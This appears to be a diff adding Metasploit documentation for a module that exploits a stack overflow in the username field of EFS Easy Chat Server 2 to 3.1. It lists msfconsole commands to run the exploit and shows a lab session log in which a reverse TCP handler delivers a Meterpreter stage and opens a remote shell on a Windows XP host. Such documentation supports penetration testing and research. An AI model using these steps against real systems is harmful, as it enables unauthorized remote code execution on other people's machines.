|
| 1 | +## Description |
| 2 | + |
| 3 | +This module exploits a vulnerability in the EFS Easy Chat Server application, from version 2 to 3.1, affecting the username parameter in Registration page 'register.ghp', which is prone to a stack overflow vulnerability. |
| 4 | + |
| 5 | +This module allows a remote attacker to get a payload executed under the context of the user running the Easy Chat Server application |
| 6 | + |
| 7 | +## Vulnerable Application |
| 8 | + |
| 9 | +[Easy Chat Server](http://echatserver.com/) Easy Chat Server is a easy, fast and affordable way to host and manage real-time communication software. |
| 10 | + |
| 11 | +This module has been tested successfully on |
| 12 | + |
| 13 | +* Easy Chat Server 3.1 on Windows XP En SP3 |
| 14 | + |
| 15 | +Installers: |
| 16 | + |
| 17 | +[EFS Easy Chat Server Installers](http://echatserver.com/ecssetup.exe) |
| 18 | + |
| 19 | +## Verification Steps |
| 20 | + |
| 21 | +1. Start `msfconsole` |
| 22 | +2. Do: `use exploits/windows/http/easychatserver_seh` |
| 23 | +3. Do: `set rhosts [IP]` |
| 24 | +4. Do: `exploit` |
| 25 | +5. You should get your payload executed |
| 26 | + |
| 27 | +## Scenarios |
| 28 | + |
| 29 | +``` |
| 30 | +marco@kali:~$ msfconsole -q |
| 31 | +msf > use exploit/windows/http/easychatserver_seh |
| 32 | +msf exploit(easychatserver_seh) > set RHOST 192.168.56.101 |
| 33 | +RHOST => 192.168.56.101 |
| 34 | +msf exploit(easychatserver_seh) > exploit |
| 35 | + |
| 36 | +[*] Started reverse TCP handler on 192.168.56.1:4444 |
| 37 | +[*] Sending stage (957487 bytes) to 192.168.56.101 |
| 38 | +[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1037) at 2017-06-20 00:43:51 +0200 |
| 39 | + |
| 40 | +meterpreter > sysinfo |
| 41 | +Computer : MM-8B040C5B05D9 |
| 42 | +OS : Windows XP (Build 2600, Service Pack 3). |
| 43 | +Architecture : x86 |
| 44 | +System Language : en_US |
| 45 | +Domain : WORKGROUP |
| 46 | +Logged On Users : 2 |
| 47 | +Meterpreter : x86/windows |
| 48 | +meterpreter > exit |
| 49 | +[*] Shutting down Meterpreter... |
| 50 | + |
| 51 | +[*] 192.168.56.101 - Meterpreter session 1 closed. Reason: User exit |
| 52 | +msf exploit(easychatserver_seh) > |
| 53 | +``` |
0 commit comments